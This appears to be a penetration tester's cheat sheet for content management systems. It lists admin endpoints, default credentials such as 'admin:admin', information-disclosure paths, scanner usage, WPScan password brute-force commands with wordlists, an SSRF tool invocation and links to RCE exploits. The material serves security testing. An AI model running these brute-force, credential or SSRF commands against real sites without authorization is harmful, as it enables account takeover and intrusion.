Vault-Tec Terminal

Pentesting CMS

AEM

aem-hacker Tool
RCE - Medium article

Django

#Admin panel endpoint
/admin/login/?next=/admin/

#Default credentials
admin:admin

Kentico

#Default credentials
administrator:<blank>

#Kentico version disclosure
/CMSPages/GetDocLink.ashx
/CMSHelp/ 

#Kentico exploit 11-12
[Kentico-RCE](https://github.com/Kr0ff/Kentico-12-RCE-via-SyncServer)

#Kentico user information disclosure
/CMSModules/Messaging/CMSPages/PublicMessageUserSelector.aspx

Magento

Magento CMS scanner
magescan

Usage:
php magescan.phar scan:all www.example.com

Other references:
Magento Security Resources

Typo3

Typo3 CMS scanner
Typo3Scan

Usage:
python3 typo3scan.py -d http://dev01.vm-typo3.loc/ --vuln

WordPress

WPScan tool:
WPScan

#Password BruteForce
wpscan --url https://site.com/wp-login.php -e u -U admin --passwords ~/SecList/Passwords/2020-200_most_used_passwords.txt

#Brute force found users and search for vulnerabilities using a free API token (up to 50 searches)
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token <YOUR_API_TOKEN> --passwords ~/Tools/SecLists/Passwords/probable-v2-top1575.txt

#SecLists:
- /Passwords/2020-200_most_used_passwords.txt
- /Passwords/Honeypot-Captures/Sucuri-Top-Wordpress-Passwords.txt
- /Passwords/Common-Credentials/500-worst-passwords.txt

WordPress Cheat-Sheet Wiki:
hacktricks
hackertarget.com

WordPress SSRF tool:
quickpress

#Usage
./quickpress -target https://target.com -server http://burpcollaborator.net

Collection of exploits, CVEs (unauthenticated) and WordPress scanners:
Wordpress-Exploits